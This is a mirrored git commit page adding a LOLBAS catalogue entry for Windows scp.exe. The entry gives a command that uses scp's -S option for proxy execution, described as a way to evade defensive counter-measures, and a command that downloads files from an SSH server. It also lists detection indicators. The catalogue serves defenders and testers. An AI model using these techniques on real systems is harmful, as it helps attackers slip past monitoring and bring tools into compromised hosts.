mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 07:18:05 +01:00
Create scp.yml
Executor and Downloader
This commit is contained in:
parent
0c0e242481
commit
613afe8ef5
28
yml/OSBinaries/scp.yml
Normal file
28
yml/OSBinaries/scp.yml
Normal file
@ -0,0 +1,28 @@
|
||||
---
|
||||
Name: scp.exe
|
||||
Description: Secure Copy Protocol
|
||||
Author: Nir Chako
|
||||
Created: 2022-11-06
|
||||
Commands:
|
||||
- Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:'
|
||||
Description: Execute notepad.exe with scp.exe as parent process
|
||||
Usecase: Use scp.exe as a proxy binary to evade defensive counter-measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: "scp <ssh-username>@192.168.187.128:<path_of_file_to_download> <path_to_save_file>"
|
||||
Description: Download file with scp.exe from am SSH server
|
||||
Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\OpenSSH\scp.exe
|
||||
Detection:
|
||||
- IOC: scp.exe spawning unexpected processes
|
||||
- IOC: Suspicious SSH internet/network traffic
|
||||
Acknowledgement:
|
||||
- Person: 'Nir Chako (Pentera)'
|
||||
Handle: '@C_h4ck_0'
|
Loading…
Reference in New Issue
Block a user